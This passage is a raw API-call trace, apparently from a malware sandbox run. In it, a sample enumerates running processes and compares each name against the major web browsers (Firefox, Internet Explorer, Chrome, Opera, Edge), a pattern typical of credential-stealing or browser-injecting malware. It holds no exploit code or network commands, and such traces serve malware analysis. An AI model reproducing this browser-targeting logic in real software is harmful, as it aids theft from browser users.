lpString2="microsoftedgecp.exe") returned 1 [0240.198] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.198] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0240.198] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0240.198] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0240.198] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0240.198] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0240.198] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.199] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0240.199] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0240.199] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0240.199] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0240.199] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0240.199] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0240.199] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0240.199] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0240.199] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0240.199] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0240.199] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0240.199] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.200] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0240.200] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0240.200] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0240.200] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0240.200] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0240.200] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.200] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0240.200] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0240.200] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0240.201] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0240.201] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0240.201] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0240.201] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0240.201] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0240.201] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0240.201] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0240.201] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0240.201] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0240.202] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0240.202] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0240.202] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0240.202] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0240.202] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0240.202] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0240.202] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0240.202] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0240.202] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0240.202] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0240.202] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0240.203] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.203] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0240.203] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0240.203] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0240.203] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0240.203] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0240.203] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0240.204] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0240.204] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0240.204] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0240.204] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0240.204] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0240.204] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0240.204] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0240.204] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0240.204] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0240.204] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0240.204] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0240.204] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0240.205] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0240.205] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0240.205] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0240.205] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0240.205] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0240.205] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0240.205] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0240.205] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0240.205] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0240.205] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0240.205] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0240.205] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0240.206] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0240.206] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0240.206] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0240.206] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0240.206] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0240.206] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0240.207] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0240.207] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0240.207] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0240.207] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0240.207] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0240.207] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0240.207] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0240.207] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0240.207] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0240.207] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0240.207] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0240.207] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0240.208] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0240.208] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0240.208] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0240.208] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0240.208] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0240.208] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0240.208] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0240.208] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0240.208] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0240.208] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0240.208] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0240.208] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0240.209] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0240.209] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0240.209] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0240.209] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0240.209] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0240.209] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0240.209] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0240.209] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0240.209] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0240.210] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0240.210] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0240.210] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0240.210] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0240.210] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0240.210] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0240.210] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0240.210] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0240.210] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0240.211] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0240.211] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0240.211] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0240.211] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0240.211] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0240.211] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0240.211] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0240.211] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0240.211] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0240.211] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0240.211] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0240.211] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0240.212] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0240.212] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0240.212] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0240.212] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0240.212] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0240.212] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0240.212] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0240.212] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0240.212] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0240.212] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0240.212] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0240.212] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0240.213] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0240.213] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0240.213] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0240.213] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0240.213] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0240.213] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0240.213] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0240.214] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0240.214] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0240.214] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0240.214] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0240.214] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0240.214] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0240.214] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0240.214] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0240.214] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0240.214] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0240.214] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0240.215] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0240.215] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0240.215] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0240.215] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0240.215] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0240.215] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0240.215] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0240.215] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0240.215] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0240.215] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0240.215] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0240.215] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0240.216] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0240.216] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0240.216] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0240.216] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0240.216] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0240.216] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0240.216] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0240.216] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0240.216] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0240.216] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0240.216] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0240.217] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.217] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0240.217] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0240.217] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0240.217] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0240.217] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0240.217] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0240.218] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0240.218] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0240.218] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0240.218] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0240.218] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0240.218] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.218] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0240.218] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0240.218] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0240.218] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0240.218] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0240.218] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0240.219] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0240.219] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0240.219] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0240.219] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0240.219] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0240.219] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, 